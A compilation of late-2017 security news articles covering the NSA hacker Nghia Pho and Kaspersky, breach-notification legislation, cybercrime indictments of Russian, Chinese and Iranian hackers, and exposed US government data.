Pho, who worked as a developer for the Tailored Access Operations (TAO) hacking group at the NSA, reportedly moved the stolen classified documents and tools to his personal Windows computer at home, which was running Kaspersky Lab software.
According to authorities, the Kaspersky Labs' antivirus software was allegedly used, one way or another, by Russian hackers to steal top-secret NSA documents and hacking exploits from Pho's home PC in 2015.
"Beginning in 2010 and continuing through March 2015, Pho removed and retained U.S. government documents and writings that contained national defense information, including information classified as Top Secret and Sensitive Compartmented Information," the DoJ said in disclosing Pho's guilty plea.
"This material was in both hard-copy and digital form, and was retained in Pho’s residence in Maryland."
For those unaware, the U.S. Department of Homeland Security (DHS) has even banned Kaspersky Labs' antivirus software from all of its government computers over suspicion of the company's involvement with the Russian intelligence agency and spying fears.
Kaspersky CEO Says He Would Leave If Russia Asked Him To Spy
Though there's no substantial evidence yet available, an article published by US news agency WSJ in October claimed that Kaspersky software helped Russian spies steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
However, Kaspersky Labs has denied any direct involvement with the Russian spies in the alleged incident.
Just last month, Kaspersky claimed that its antivirus package running on the Pho's home PC detected the copies of the NSA exploits as malicious software, and uploaded them to its cloud for further analysis by its team of researchers.
According to the company, as soon as its analysts realized that its antivirus had collected more than malicious binaries, the company immediately deleted the copy of the classified documents, and also created a special software tweak, preventing those files from being downloaded again.
Even, when asked if Russian intel agency had ever asked him to help it spy on the West at a media briefing at the Kaspersky's offices in London on Tuesday, CEO Eugene Kaspersky said "They have never asked us to spy on people. Never."
Kaspersky further added that "If the Russian government comes to me and asks me to anything wrong, or my employees, I will move the business out of Russia."
NSA Hacker Faces A Prison Sentence Of Up To 10 Years
In Pho's plea deal with prosecutors, the NSA hacker admitted that he copied information from NSA computers multiple times between 2010 and 2015 and took it all home with him.
Taking classified documents at home is a clear violation of known security procedures—and in this process, Pho eventually exposed the top secret information to Russian spies.
Pho has pleaded guilty in a United States district court in Baltimore to one count of willful removal and retention of national defense information, with no other charges filed against him and there's no mention of Pho selling or passing off that confidential data.
The retention of national defense information offense carries a possible 10-year prison sentence.
Federal prosecutors said they would seek an eight-year sentence for Mr. Pho. However, his attorney can ask for a more lenient sentence.
Pho remains free while awaiting sentencing on 6th April next year.


Kaspersky case – Now we know who is the NSA hacker who kept Agency’s cyber weapons at home
3.12.2017 securityaffairs BigBrothers

A former NSA hacker pleaded guilty on Friday to illegally taking classified documents home, which were later stolen by Russian cyber spies.
A member of the US National Security Agency Tailored Access Operations hacking team, Nghia Hoang Pho (67) pleaded guilty in a US district court in Baltimore on Friday to one count of willful retention of national defense information.

The Vietnam-born American citizen, who lives in Ellicott City, Maryland, has been charged with illegally removing top secret materials.

The NSA hacker admitted taking home copies of classified NSA hacking tools and exploits with the knowledge that they were cyber weapons.

The tools were detected by the Kaspersky Lab software installed on the NSA hacker’s personal computer and were sent back to Kaspersky’s server for further analysis.

Kaspersky Lab, published recently a detailed report on how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

According to the telemetry logs collected by the Russian firm, the staffer temporary switched off the antivirus protection on the PC, and infected his personal computer with a spyware from a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the NSA employee’s PC, sometime later the employee disabled the Kaspersky software to execute the activation-key generator.

Then the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky published a second report that sheds the light on the investigation conducted by the firm on the NSA-linked Equation Group APT.

Kaspersky has begun running searches in its databases since June 2014, 6 months prior to the year the alleged hack of its antivirus, for all alerts triggered containing wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a LARGE number of false positives.

The analysis revealed the presence of a specific signature that fired a large number of times in a short time span on just one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred below as “[undisclosed].7z”). This is the beginning of the analysis of the system that was found containing not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development.

The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of the Microsoft Office 2013, but the .ISO was containing the Mokes backdoor.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two month its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

The security firm explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

NSA hacker

The NSA hacker Pho now faces roughly six to eight years in prison, with sentencing set for April 2017.

According to the plea deal, Pho broke federal law because he took the codes at home multiple times, he admitted that, over a five-year period starting in 2010, he copied the information from NSA machines and took it all home with him.

“Beginning in 2010 and continuing through March 2015, Pho removed and retained U.S. Government documents and writings that contained national defense information, including information classified as Top Secret and Sensitive Compartmented Information,” the US Department of Justice said in disclosing the guilty plea.

“This material was in both hard-copy and digital form, and was retained in Pho’s residence in Maryland.”

The positive aspect of the story is that Pho did act with cyber espionage purposes, he wasn’t charged to sell or pass off any of the data.

The fact that Pho was the third NSA employee charged in the past two years for taking home top-secret information is embarrassing and highlights the risk of insiders.


Elite U.S. Government Hacker Charged With Taking Secret Information
2.12.2017 securityweek BigBrothers
A member of the US National Security Agency's elite hacking team has been charged with illegally removing top secret materials, in an embarrassing breach for the crucial electronic espionage body.

The Justice Department said Friday that Nghia Hoang Pho, 67, a 10-year veteran of the NSA's Tailored Access Operations unit, which broke into computer systems, agreed to plead guilty to a single charge of removing and retaining top-secret documents from the agency.

He kept the material at his Ellicott City, Maryland home.

According to The New York Times, it was Vietnam-born Pho's computer that apparent Russian hackers accessed via his use of Kaspersky software to steal files and programs the NSA developed for its own hacking operations.

The Justice Department said Pho had taken printed and digital copies of documents and writings labelled "secret," and containing sensitive "national defense information," and stored them in his home from 2010 until he was caught in 2015.

It gave no detail on why he did that, and did not say whether Pho had revealed or lost any of the information.

Pho faces up to 10 years in prison, though could negotiate a lighter punishment.

He was the third NSA employee charged in the past two years for taking home top-secret information.

The NSA declined to respond to questions on the case.

In October The Wall Street Journal reported that Russian hackers exploited anti-virus software made by Kaspersky Lab to steal top secret materials from an unnamed NSA employee.

The Journal said the 2015 hack led to the Russians obtaining information on how the NSA itself penetrates foreign computer networks and protects itself from cyberattacks.

The incident was a key reason why the US government earlier this year announced a ban on use of Kaspersky anti-virus software on government computers, warning that the Moscow-based company has suspect links to Russian intelligence.

Kaspersky denies any ties to the Russian government, but said its own forensic investigation did show that hackers made use of its software to break into the NSA worker's home computer.

Kaspersky said what was stolen included essential source code for so-called Equation Group hacking software from the NSA.


Senators Propose New Breach Notification Law
2.12.2017 securityweek BigBrothers
Senators Propose New Data Protection Bill Following Equifax and Uber Breaches

Following the Equifax breach and the hidden Uber breach, three U.S. senators have introduced the Data Security and Breach Notification Act. Its purpose is to ensure better protection of personal information, and to provide a nationwide standard breach notification requirement. It is effectively a re-introduction of the 2015 bill of the same name.

The bill is sponsored by three Democrats: Sen. Bill Nelson of Florida, Sen. Richard Blumenthal of Connecticut, and Sen. Tammy Baldwin of Wisconsin. Statements from Nelson and Baldwin show clearly that the recent Uber and Equifax breaches are the specific catalysts.

"The recent data breaches, from Uber to Equifax, will have profound, long-lasting impacts on the integrity of many Americans' identities and finances, and it is simply unacceptable that millions of them may still not know that they are at risk, nor understand what they can and should do to help limit the potential damage," said Senator Baldwin.

"We need a strong federal law in place to hold companies truly accountable for failing to safeguard data or inform consumers when that information has been stolen by hackers," said Nelson. "Congress can either take action now to pass this long overdue bill or continue to kowtow to special interests who stand in the way of this commonsense proposal. When it comes to doing what's best for consumers, the choice is clear."

There are three noteworthy aspects to this bill: 30 days to disclose following a breach; up to five years in prison for failure to do so; and the FTC with NIST to draw up recommendations on the technology or methodologies necessary to avoid such sanctions.

Under this bill, customers affected by a breach must be informed within 30 days if they are at risk. "There shall be a presumption that no reasonable risk of identity theft, fraud, or other unlawful conduct exists following a breach of security if," says the bill, the data is adequately indecipherable, for example (although not specified), by encryption.

The FTC/NIST 'standards' requirement is in the bill to define how and with what technology personal data can be made indecipherable -- and is likely to dismay security officers with yet another standard that must be observed. The potential for regulatory confusion can be seen in a comparison between this data 'privacy' requirement and that of Europe's General Data Protection Regulation (GDPR).

Staying with the example of Uber and Equifax, both companies would be liable under both laws if they were already in force. The basic requirement under GDPR is notification within 72 hours to the regulator (Article 33), or without undue delay to customers (Article 34) if they are at risk from the breach. It is 30 days under the U.S. law.

Since many survey have repeatedly demonstrated that not all U.S. companies understand GDPR, or even know that they will be liable, it is possible that some will wrongly assume they have an additional four weeks before being required to disclose. Just as disconcerting would be for EU customers to learn of their danger before their American counterparts.

"It's surprising that U.S. still lacks a single federal regulation covering mandatory breach disclosures," Matt Lock, director of sales engineers at Varonis told SecurityWeek. "The proposed 30-day notification rule is a step in the right direction, but a far cry from the GDPR's 72-hour rule. If the U.S. legislation passed, it's not difficult to imagine a situation in which EU consumers would learn of a breach hitting a U.S. company long before U.S. consumers are notified."

Lock believes that best timescale would be something between the two. "U.S. lawmakers want to show their support of constituents and their distaste for companies that try to fly under the radar in the wake of a major breach," he said. "But they are also trying to be more realistic. Anyone who has spent time on an incident response team knows how chaotic the first 72-hours can be. Perhaps 30 days is a bit too lenient, but the GDPR 72-hour window may result in businesses scrambling and disclosing incomplete or inaccurate information."

There is one major difference between the U.S. bill and GDPR: GDPR has huge financial sanctions but no prison time, while Nelson's bill has no specified financial sanction, but up to five years in prison. "With this new legislation bill, companies providing services to both the US and EU citizens will have two major breach notification requirements that come with significant impact," Comments Thycotic's chief security scientist Joseph Carson. "From huge financial sanctions in the EU that could be as much as 4% of annual turnover globally, and -- if customers are not notified in 30 days -- a prison term in the U.S. These two major legal requirements could change the way companies approach and prioritize cybersecurity and risk meaning they could no longer ignore the need for better security."


Russian Cybercriminal Gets Another Prison Sentence
1.12.2017 securityweek BigBrothers
Roman Valeryevich Seleznev, the son of a Russian lawmaker, has been handed another prison sentence in the United States for his role in a massive cybercrime ring.

The 33-year-old, known online as Track2, Bulba and Ncux, was previously sentenced by a U.S. court to 27 years in prison for 38 counts of wire fraud, hacking, identity theft, and payment card fraud.

After pleading guilty to racketeering and conspiracy to commit bank fraud charges on September 7, he received another 14-year prison sentence for the first charge in Nevada and another 14 years for the second charge in Georgia. The sentences will run concurrently to each other and to the previous 27-year sentence.

Seleznev has also been ordered to pay nearly $51 million in the Nevada case and over $2.1 million in the Georgia case.

According to authorities, Seleznev admitted being part of Carder.su, an Internet-based organization that specialized in identity theft and credit card fraud. The Russian national created a website, which he advertised on Carder.su, to allow fraudsters to easily purchase stolen payment card data for roughly $20 per account number.

Authorities estimate that activities conducted by members of Carder.su resulted in victims losing a total of $50,893,166.35, the exact amount that Seleznev has been ordered to pay.

In the Georgia case, Seleznev admitted being a “casher” (i.e. an individual who withdraws cash using stolen bank account information) in a scheme targeting an Atlanta-based firm that processed credit and debit card transactions for financial institutions. Hackers breached the company’s systems and obtained more than 45 million payment cards, which they used to withdraw over $9.4 million from 2,100 ATMs in 280 cities worldwide. The money was withdrawn in less than 12 hours.

Law enforcement conducted a massive operation targeting Carder.su users and operators. A total of 55 individuals have been charged and 33 of them have already been convicted; the rest are either pending trial or are on the run.


Should Social Media be Considered Part of Critical Infrastructure?
30.11.2017 securityweek  BigBrothers
Social Media Networks

Is Social Media a Critical Industry?

Russia interfered in the U.S. 2016 election, but did not materially affect it. That is the public belief of the U.S. intelligence community. It is a serious accusation and has prompted calls for additions to the official 16 critical infrastructure categories. One idea is that 'national elections' should be included. A second, less obviously, is that social media should be categorized as a critical industry.

The reason for the latter is relatively simple: social media as a communications platform is being widely used by adversary organizations and nations to disseminate their own propaganda. This ranges from ISIS using it as a recruitment platform, to armies of Russian state-sponsored trolls manipulating public opinion via Twitter.

Russian interference, or opinion manipulation, has not been limited to the U.S. Both France and Germany worried about it prior to their own national elections. On Nov. 3, this year, Damian Collins, Chair of the Digital Culture and Sport Select Committee in the UK wrote to Twitter's Jack Dorsey asking for information on the so-called Russian Internet Research Agency. He asked for a list of Russian accounts and posts linked to politics in the UK. Brexit is not mentioned, but interference in the UK Brexit referendum is clearly the concern.

One week later, CNN Money reported, "A network of Twitter accounts with ties to the Russian government-linked troll army that meddled in U.S. politics posted dozens of pro-Brexit messages on the day of the referendum on the United Kingdom's membership of the European Union in June 2016."

The assumed purpose of Russian interference in politics has been to promote extreme right-wing national populist movements that would weaken centrist governments. This is clearly an 'attack' against western nations, delivered primarily via social networks. It is noticeable that in both the US election and the Brexit referendum there was a late and in many ways unexpected shift to the right.

Nevertheless, the idea of social media as a critical industry is a difficult concept. Malcolm Harkins, chief security and trust officer at Cylance, doesn't think it is a great stretch. He points to the origins of the existing 16 industry sectors and notes that the primary motivation is to maintain their availability following the 9/11 attack.

The DHS introduces its definition of the critical infrastructure with, "There are 16 critical infrastructure sectors whose assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof." These include 'energy', 'finance', 'transport', 'communications' and 'IT'. Maintaining the availability and continued operation of all of these sectors is clearly critical to the well-being of the nation. Maintaining the availability of social media does not seem so critical.

Harkins' argument, however, is that the world has changed since the origins of the critical infrastructure classification.

Business and society have gone through, and are still going through, a dramatic 'digitization' of their operations. The internet and all things cyber have become fundamental to the operation of the economy and society.

"Where cyber is concerned," Harkins told SecurityWeek, "the 'A' of 'CIA' is not enough. The Availability of the critical infrastructure must now be bolstered by the Integrity of the critical infrastructure."

This should not be considered a trivial concern. The manipulation of information has always been a part of warfare, usually as a precursor to a kinetic attack.

"There has always been the notion of information manipulation in warfare -- such as deception," says Harkins. "If you can manipulate your enemy prior to a kinetic event, then you would have advantage over them."

Alexander's victory over Porus in 326 BC through the Allied landings in Normandy in 1944, to Stormin Norman's Desert Storm in 1991 have all relied heavily on feeding the enemy misinformation.

"The world today," he continued, "is based on information with headlong digitization of both business and society. With everything now based on our reaction to and use of information, the integrity of that information has never been more vital."

The availability of the Communications and IT sectors is already considered critical, and social media is the most important and widespread platform that unites the communications and IT sectors. If the concept of the critical infrastructure is widened from availability to include integrity, then social media is already, de facto, part of the critical infrastructure. "At what point," asks Harkins, "does the integrity of the information flowing through the IT sector or the communications sector hit a significant and material risk that will force us to consider it critical?"

How this could work in practice is a different matter, for it couldn't be limited to integrity in social media platforms. Facebook is not the only advertising medium that could run propagandist advertising (some 3,000 Russia-linked advertisements were placed on Facebook in 2016 apparently designed to influence the presidential election). "My guess is that even well beyond social media, mainstream physical advertising has been bought and used for the purpose of manipulating national sentiment." If social media can be considered 'critical', then the whole concept of Fake News must be treated in the same way.

That would be a major task. Social media is perhaps the most pressing aspect of this, and could even prove a testbed for wider communications controls. ìI think the case increasingly can, and will be made that social media is a part of critical infrastructure in that Twitter, Facebook and other media channels have become the 'go-to' resources for a large percentage of Americans," comments Dan Lohrmann, CSO at Security Mentor. "Yes - social media is slowly becoming a critical part of critical infrastructure for our nation and other developed countries."

But Nathan Wenzler, chief security strategist at AsTech, is not sure we are ready for this. He takes the 'availability' view of critical infrastructure. "Even with the potential influence of the last U.S. presidential election, I do not believe we should be looking at these social media services in the same way we view power, water, and other utility services which are required for people's daily lives," he told SecurityWeek. "If social media services were disrupted... there would be some outrage by the users, but by and large, their lives would not be dramatically impacted from a health or well-being standpoint. For this reason alone, I don't see that we're quite at the point of considering social media to be the same as these other critical services."

He believes things may change in the future, but raises two of the many practical problems that will arise: accountability for users and attribution for attackers. Chris Roberts, chief security architect at Acalvio, takes a similar view. "We have little ability or success in being able to protect that which is already classified as critical infrastructure. The red tape is worn thin with excuses: the technology is not in place to deal with both 20 year old systems and modern insecure devices interconnected through a cloud-like pea-soup fog," he said.

"If you want to consider the core systems as critical infrastructure, then you have to be able to manage, control and understand the access permissions, uniquely identify individuals and put some controls into access and other areas. That both seems like a tall challenge (getting 300M Americans to agree to security controls for their social media) and also something that might eventually break the constitutional rights of those folks to actually speak freely. If you put controls in place, where does that end?"

But if Harkins is right and the concept of integrity will need to be added to the concept of availability for the critical infrastructure, then something will have to change. There are signs that governments are beginning to feel threatened and therefore concerned. The UK government has been particularly vociferous over the last year, telling the social tech giants that if they don't get their house in order, government will do it for them.

Indeed, the current government's manifesto (a pre-election statement of intent) contains a strong purpose to control social media. "Some people say that it is not for government to regulate when it comes to technology and the internet," it says. "We disagree... it is for government, not private companies, to protect the security of people and ensure the fairness of the rules by which people and businesses abide."

The clear implication is that the tech giants' protestations of: 'don't limit freedom of speech', 'legislation will stifle innovation', and 'it's not technologically possible' will not be accepted. Even U.S. lawmakers seem to be moving in a similar direction. On Tuesday, Nov. 21, counsels for Google, Facebook and Twitter were in Washington answering questions put at the Senate hearing on social media's role in the 2016 election.

At one point, Senator John Kennedy (R-LA) said, "I don't believe you have the ability to identify all your advertisers." The tech companies effectively admitted this -- although the reality is probably they cannot control advertising without losing some of it. But if government wishes to prevent foreign entities interfering in future elections, this quality of knowledge is essential. Social media should take note that there is precedent; government has enforced advertising control on new technology in the past. In the 1930s, new radio services carried misinformation and propaganda in the form of advertisements. The government cracked down on this with the 1934 Communications Act, placing greater responsibility on the medium to choose which advertisements it accepted. It could do similar with social media.

The likelihood of some legislative control over social media is growing. In the U.S. the primary concern seems to be its potential for foreign propaganda aimed at controlling national sentiment.

In the UK the primary concern is its use by terrorist groups and organized crime -- although there is now some concern that Russia may have attempted to influence the Brexit referendum.

If Harkins is right, then this is really the visible effect of an underlying need to add integrity to the availability of the critical infrastructure. And if that is correct, then the legislation will need to apply to the whole communications sector and not just the social media aspect. But it goes further. If the need to apply integrity has grown through the digitization of industry, then the implication is that it will require confidentiality as well as integrity and availability if its security is to be assured. Confidentiality is best applied through encryption; and we are seeing increasing interest by government in controlling encryption. That, however, is a different battle; and both would benefit from a national debate.


Classified U.S. Army Data Found on Unprotected Server
29.11.2017 securityweek BigBrothers
Tens of gigabytes of files apparently belonging to the United States Army Intelligence and Security Command (INSCOM), including classified information, were stored in an unprotected AWS S3 bucket, cyber resilience firm UpGuard reported on Tuesday.

According to the company, its director of cyber risk research, Chris Vickery, discovered the data on an AWS subdomain named “inscom” in late September.

Fort Belvoir, Virginia-based INSCOM is an intelligence command operated by both the U.S. Army and the National Security Agency (NSA).

The AWS storage container found by UpGuard included, among others, a virtual machine image that may have been used to send, receive and handle classified data. Some of the files contained in the VM were marked as “Top Secret” and “NOFORN,” which indicates that the information cannot be shared with foreign nationals.

Metadata found by researchers indicated that a now-defunct defense contractor named Invertix had worked in some capacity on the data stored in the virtual machine. The files in the bucket also included Invertix private keys and other data that could have provided access to the contractor’s internal systems, UpGuard said.

The exposed files also included information on a failed Army program named “Red Disk.” The $93 million program, designed to allow troops to exchange information in real time, was a cloud computing component of the Distributed Common Ground System–Army (DCGS-A) intelligence platform. The misconfigured container also stored details on the DCGS-A itself.

“Plainly put, the digital tools needed to potentially access the networks relied upon by multiple Pentagon intelligence agencies to disseminate information should not be something available to anybody entering a URL into a web browser,” said UpGuard’s Dan O'Sullivan.

“It is unnecessary to speculate as to the potential value of such an exposed bucket to foreign intelligence services or malicious individual actors; the care taken to classify sections of the exposed virtual drive as ‘Top Secret’ and ‘NOFORN’ provide all the indications necessary to determine how seriously this data was taken by the Defense Department,” he added.

INSCOM has not responded to SecurityWeek’s request for comment. The data is no longer accessible, but it’s still unclear who is responsible for exposing it.

This is not the first time UpGuard claims to have found data belonging to the Pentagon and other U.S. government organizations. The list of impacted agencies includes the National Geospatial-Intelligence Agency (NGA), the Central Command (CENTCOM) and the Pacific Command (PACOM), the Secret Service, and the Department of Homeland Security (DHS).

The common denominator in these incidents were unprotected S3 buckets operated by third-party contractors.


Security of U.S. Government Sites Improved Only Slightly: Report
28.11.2017 securityweek BigBrothers
The security of websites owned by the United States government has improved only slightly in the past months, according to a report published on Monday by the Information Technology and Innovation Foundation (ITIF).

ITIF has analyzed nearly 300 of the most visited U.S. government websites to see if they are fast, secure, mobile friendly, and accessible for users with disabilities. In terms of security, the study focused on whether these sites use HTTPS, DNSSEC, and if they are affected by known vulnerabilities.

According to ITIF, of the government websites included in the top 100,000 of the Majestic Million ranking, 75% use HTTPS, which encrypts communications between the user’s browser and the site. This represents a 3% decrease compared to data from a report published by the organization in March. However, overall, the percentage of government sites that have properly implemented SSL has increased from 67% to 71%.

Of the 260 sites tested for both reports, 31% showed improvement in SSL deployment, while 14% were less secure.

SSL score of federal websites

The U.S. Department of Homeland Security (DHS) recently ordered all federal agencies to start using web and email security technologies such as HTTPS, DMARC and STARTTLS within the next few months.

ITIF’s report shows that 8% of websites have not implemented HTTPS at all, but this is still an improvement compared to the 14% from the previous report. The Department of Defense (defense.gov) is one of the agencies that recently rolled out HTTPS, and the International Trade Administration (trade.gov) is among those that still lack the security feature.

SSL tests, conducted by ITIF using Qualys’ SSL Server Test, also showed that some government websites have important vulnerabilities. For example, the Trade Representative (ustr.gov) and National Weather Service (weather.gov) sites are vulnerable to POODLE attacks, and trade.gov and tsunami.gov (Tsunami Warning Centers) are susceptible to DROWN attacks.

As for DNSSEC, the protocol designed to prevent attackers from redirecting users to malicious sites via DNS spoofing, ITIF found that 90% of U.S. government websites have it enabled. Since the previous report, 15 federal sites activated DNSSEC and two deactivated the feature.

“Of the top 100,000 websites reviewed only 70 percent passed both the DNSSEC and SSL test. Several of these top 100,000 websites did not have DNSSEC or HTTPS implemented. One example is the Administrative Office of the U.S. Courts (uscourts.gov), which also scored low in the security category in the initial report,” ITIF said in its 2017-benchmarking-us-government-websites.

Shortly after the DHS ordered federal agencies to improve their security, Agari analyzed government websites to see how many had implemented the DMARC anti-email spoofing protocol. In mid-October when the company published its report, nearly 82% of websites lacked DMARC entirely.


U.S. Indicts Chinese For Hacking Siemens, Moody’s
28.11.2017 securityweek BigBrothers
U.S. authorities filed charges Monday against three China-based hackers for stealing sensitive information from U.S. based companies, including data from Siemens industrial groups and accessing a high-profile email account at Moody’s.

Wu Yingzhuo, Dong Hao and Xia Lei, who the Department of Justice (DOJ) says are Chinese nationals and residents of China, were indicted by a grand jury for a series of cyber-attacks against three corporate victims in the financial, engineering and technology industries between 2011 and May 2017.

Victims named in the indictment include Moody’s Analytics, Siemens, and GPS technology firm Trimble.

According to the FBI, the hackers work for Guangzhou Bo Yu Information Technology Company Limited, a firm that purports to be a China-based Internet security firm also known as “Boyusec.”

Tracked as APT3 by FireEye, and Gothic Panda by CrowdStrike, the group is also known as UPS Team, Buckeye and TG-0110, and has previously been linked to the Chinese Ministry of State Security (MSS).

“We’ve tracked their activity back to 2007 and they are one of the most technically advanced state-affiliated actors in China,” Adam Meyers, VP of Intelligence at CrowdStrike, told SecurityWeek. “Their previous targeting includes industries such as Aerospace, Defense, Energy, Technology, NGOs, etc., that are primarily aligned with China’s economic objectives.”

In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that Boyusec had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

According to the indictment, the hackers:

• Stole approximately 407 gigabytes of proprietary commercial data pertaining to Siemens’s energy, technology and transportation businesses.

• Accessed the internal email server of Moody’s Analytics and placed a forwarding rule in the email account of a prominent employee, and set it to forward all emails to and from the account to web-based email accounts controlled by the attackers.

• Stole at least 275 megabytes of data, including compressed data, which included hundreds of files that would have assisted a Trimble competitor in developing, providing and marketing a similar product without incurring millions of dollars in research and development costs.

“The primary goal of the co-conspirators’ unauthorized access to victim computers was to search for, identify, copy, package, and steal data from those computers, including confidential business and commercial information, work product, and sensitive victim employee information, such as usernames and passwords that could be used to extend unauthorized access within the victim systems,” the DOJ said. “For the three victim entities listed in the Indictment, such information included hundreds of gigabytes of data regarding the housing finance, energy, technology, transportation, construction, land survey, and agricultural sectors.”

Intrusion Truth previously conducted an analysis of APT3’s command and control (C&C) infrastructure, and analyzed domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Researchers noticed last year that the group had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

CrowdStrike has seen an uptick in activity by the group since 2016, Meyers said.

In addition to Pirpi, Symantec observed APT3 using various other tools, including keyloggers, remote command execution tools, system information harvesting tools, and browser password stealers. Researchers said the group appears to be focusing on file and print servers, which suggests they are mainly interested in stealing documents to support their espionage efforts.

“Defendants Wu, Dong and Xia launched coordinated and targeted cyber intrusions against businesses operating in the United States, including here in the Western District of Pennsylvania, in order to steal confidential business information,” said Acting U.S. Attorney Song. “These conspirators masked their criminal conspiracy by exploiting unwitting computers, called ‘hop points,’ conducting ‘spearphish’ email campaigns to gain unauthorized access to corporate computers, and deploying malicious code to infiltrate the victim computer networks.”


'Advanced' Cyber Attack Targets Saudi Arabia
22.11.2017 securityweek BigBrothers
Saudi authorities said Monday they had detected an "advanced" cyber attack targeting the kingdom, in a fresh attempt by hackers to disrupt government computers.

The government's National Cyber Security Centre said the attack involved the use of "Powershell", but it did not comment on the source of the attack or which government bodies were targeted.

"The NCSC has detected a new Advanced Persistent Threat (APT) that is targeting Saudi Arabia," the agency said in a statement, adding the attack sought to infiltrate computers using email phishing techniques.

Saudi Arabia has come under frequent cyber attacks, including "Shamoon", the aggressive disc-wiping malware employed in attacks against the Saudi energy sector in 2012.

Saudi Aramco, the world's biggest oil company, was among the firms hit by Shamoon, in what is believed to be the country's worst cyber attack yet.

US intelligence officials at the time said they suspected a link to the kingdom's regional rival Iran.


U.S. charges Iranian state-sponsored hacker over ‘Game of Thrones’ HBO hack
22.11.2017 securityaffairs BigBrothers

US Department of Justice charged the Iranian computer expert Behzad Mesri of ‘Games of Thrones’ HBO Hack, he also worked with the Iranian Military.
The United States charged the Iranian computer expert Behzad Mesri of ‘Games of Thrones‘ HBO Hack. On Tuesday, the man was charged with stealing scripts and plot summaries for ‘Games of Thrones’.

The Manhattan US attorney Joon Kim said Mesri is “had previously hacked computer systems for the Iranian military”. The man threatened to release stolen data, unless HBO paid a $6 million ransom in Bitcoin.

“Behzad Mesri, an Iranian national who had previously hacked computer systems for the Iranian military, allegedly infiltrated HBO’s systems, stole proprietary data, including scripts and plot summaries for unaired episodes of Game of Thrones, and then sought to extort HBO of $6 million in Bitcoins.” said U.S. Attorney Joon H. Kim. “Mesri now stands charged with federal crimes, and although not arrested today, he will forever have to look over his shoulder until he is made to face justice. American ingenuity and creativity is to be cultivated and celebrated — not hacked, stolen, and held for ransom. For hackers who test our resolve in protecting our intellectual property — even those hiding behind keyboards in countries far away — eventually, winter will come.”

Behzad Mesri, who is still at large, is an Iran-based hacker who also goes online with the moniker Skote Vahshat.

Mesri faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.

HBO

The DoJ accused the man of being the mastermind behind the cyber attacks against HBO from May to August, he stole scripts and plot summaries for then unaired episodes of the “Game of Thrones” series, and multiple other shows.

Mersi compromised multiple user accounts belonging to HBO employees and other authorized users, in this way he accessed the company servers and stole confidential and proprietary information.

“Over the course of several months, MESRI used that unauthorized access to steal confidential and proprietary information belonging to HBO, which he then exfiltrated to servers under his control.” states the press release published by the US Department of Justice.

“Through the course of the intrusions into HBO’s systems, MESRI was responsible for stealing confidential and proprietary data belonging to HBO, including, but not limited to: (a) confidential video files containing unaired episodes of original HBO television programs, including episodes of “Barry,” “Ballers,” “Curb Your Enthusiasm,” “Room 104,” and “The Deuce;” (b) scripts and plot summaries for unaired programming, including but not limited to episodes of “Game of Thrones;”(c) confidential cast and crew contact lists; (d) emails belonging to at least one HBO employee; (e) financial documents; and (f) online credentials for HBO social media accounts (collectively, the “Stolen Data”).”

According to the US prosecutors, Mesri previously conducted computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

Prosecutors confirmed that the Iranian man was a member of the Iranian-based Turk Black Hat Security hacking group that targeted hundreds of websites in the United States and around the world.

“MESRI is an Iran-based computer hacker who had previously worked on behalf of the Iranian military to conduct computer network attacks that targeted military systems, nuclear software systems, and Israeli infrastructure.” continues the DoJ.

“At certain times, MESRI has been a member of an Iran-based hacking group called the Turk Black Hat security team and, as a member of that group, conducted hundreds of website defacements using the online hacker pseudonym “Skote Vahshat” against websites in the United States and elsewhere.”


U.S. Charges Iranian Over 'Game of Thrones' HBO Hack
21.11.2017 securityweek BigBrothers
The United States on Tuesday charged an Iranian computer whiz with hacking into HBO, stealing scripts and plot summaries for "Games of Thrones," and trying to extort $6 million in Bitcoin out of the network.

US prosecutors in New York unveiled a seven-count indictment against Behzad Mesri, whom they identified as an Iran-based hacker who also goes by the name Skote Vahshat. Mesri is still at large, a spokesman for the US Attorney's office in Manhattan told AFP.

Mesri is accused of orchestrating a hack of HBO from May to August, then threatening to release stolen data unless the premium cable network paid a $6 million ransom in the digital currency Bitcoin.

US prosecutors say he stole scripts and plot summaries for then unaired episodes of the global smash hit "Game of Thrones" series, and unaired episodes for multiple other shows, including the "Curb Your Enthusiasm" comedy series.

He is accused of compromising multiple user accounts, and in July of sending an anonymous email to HBO personnel saying: "Hi to All losers! Yes it's true! HBO is hacked!... Beware of heart Attack!!!"

Mesri leaked some of the stolen data over the Internet onto websites he controlled, US federal prosecutors allege.

The Iranian suspect faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.

US prosecutors accuse Mesri of previously conducting computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

They also said he was a member of the Iranian-based Turk Black Hat Security hacking group, targeting hundreds of websites in the United States and around the world.


North Korean Hackers Target Android Users in South
